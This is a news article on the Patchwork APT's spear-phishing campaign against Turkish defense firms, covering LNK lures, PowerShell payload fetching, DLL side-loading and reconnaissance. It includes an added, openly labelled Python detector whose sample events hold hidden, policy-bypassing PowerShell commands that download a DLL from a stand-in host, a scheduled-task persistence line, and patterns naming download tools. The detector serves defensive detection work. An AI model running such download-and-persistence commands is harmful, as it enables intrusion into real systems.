
The threat actor known as Patchwork has been attributed to a new spear-phishing campaign targeting Turkish defense contractors, with the goal of collecting strategic intelligence.
"The campaign employed a five-stage execution chain delivered through malicious LNK files disguised as conference invitations, sent to lure recipients interested in unmanned vehicle systems," Arctic Wolf Labs said in a technical report published this week.
The activity, which also singled out an unnamed manufacturer of precision-guided missile systems, appears to be geopolitically motivated, coming at a time of closer ties between Pakistan and Türkiye and recent India-Pakistan military clashes.
Patchwork, also known as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger and Zinc Emerson, is assessed to be a state-sponsored actor of Indian origin. Known to have been active since at least 2009, the hacking group has a track record of striking institutions in China, Pakistan and other countries in South Asia.
Exactly a year ago, the Knownsec 404 Team documented Patchwork's targeting of institutions with ties to Bhutan to distribute the Brute Ratel C4 framework and an updated version of a previously documented backdoor called PGoShell.
Since the start of 2025, the threat actor has been linked to various campaigns aimed at Chinese universities, with recent attacks delivering a Rust-based loader using power-grid-related lures in the country, which in turn decrypts and launches a C# trojan called Protego that harvests a wide range of information from Windows systems.
Another report published by the Chinese cybersecurity firm QiAnXin in May said it identified infrastructure overlaps between Patchwork and the DoNot Team (aka APT-38 or Belvis), suggesting a possible operational connection between the two threat groups.
The targeting of Türkiye by the hacking group indicates an expansion of its targeting footprint. Malicious Windows shortcut (LNK) files, distributed via phishing emails, serve as the starting point that kicks off the multi-stage infection process.
In particular, the LNK file is designed to invoke PowerShell commands responsible for fetching additional payloads from an external server ("Exampuve[.]Org"), a domain registered on 25 June 2025 that hosts a decoy PDF mimicking an international conference on unmanned vehicle systems, the details of which are hosted on a legitimate waters[.]org website.
"The PDF document acts as a visual decoy, designed to distract the user while the rest of the execution chain runs quietly in the background," Arctic Wolf said. "This targeting occurs as Türkiye commands 65% of the global UAV export market and develops significant hypersonic missile capabilities, while simultaneously strengthening defense relations with Pakistan during a period of India-Pakistan tension."
The downloaded artifacts include a malicious DLL that is launched via DLL side-loading through a scheduled task, eventually leading to the execution of shellcode that performs comprehensive reconnaissance of the compromised host, including taking screenshots, and sends the results back to the server.
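As an added example that is not part of the Arctic Wolf report or this article, the following Python detector flags two stages of the chain described above in process-creation telemetry: PowerShell spawned from Explorer that pulls payloads from a remote host (the LNK stage), and a scheduled task whose action lives in a user-writable directory (the side-loading stage). The event format, domain and paths are constructed for illustration.

```python
import re

# Constructed sample process-creation events (parent image, child image, command line).
# They are illustrative only and are not indicators from the Arctic Wolf report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell.exe -w hidden -ep bypass -c "iwr https://invite.example/decoy.pdf '
                 '-OutFile $env:TEMP\\invite.pdf; iwr https://invite.example/s.dll -OutFile $env:TEMP\\s.dll"')},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\\Users\\u\\AppData\\Local\\Temp\\host.exe"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Get-Date"'},  # benign: no remote fetch
]

# Download primitives commonly seen in stage-one loaders, plus a URL matcher.
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"';]+", re.I)
# Flags that hide the window or relax execution policy; recorded as context, not required for a hit.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-enc\b", re.I)
TASK_ACTION_RE = re.compile(r"/tr\s+\"?([^\"]+?)\"?(\s+/|$)", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a finding per event that matches one of the two stage rules."""
    findings = []
    for ev in events:
        image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
        # Stage 1: a shortcut opened from Explorer spawns PowerShell that fetches remote payloads.
        if image == "powershell.exe" and parent == "explorer.exe" \
                and DOWNLOAD_RE.search(cmd) and URL_RE.search(cmd):
            findings.append({"rule": "lnk_powershell_download",
                             "urls": URL_RE.findall(cmd),
                             "evasion_flags": bool(HIDDEN_RE.search(cmd))})
        # Stage 2: persistence via a scheduled task whose action sits in a user-writable path,
        # the typical home of a dropped side-loading host and its malicious DLL.
        if image == "schtasks.exe" and "/create" in cmd.lower():
            m = TASK_ACTION_RE.search(cmd)
            if m and USER_WRITABLE_RE.search(m.group(1)):
                findings.append({"rule": "schtask_user_writable_action", "action": m.group(1)})
    return findings
```

Run against real telemetry, the same two rules can be fed from Sysmon event ID 1 or EDR process-start records by mapping the three fields.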
"This represents a significant evolution of this threat actor's capabilities, moving from the x64 DLL variants seen in November 2024 to the current x86 PE execution with enhanced command structures," the company said. "Dropping Elephant demonstrates sustained operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and an enhanced C2 protocol implementation that mimics legitimate websites."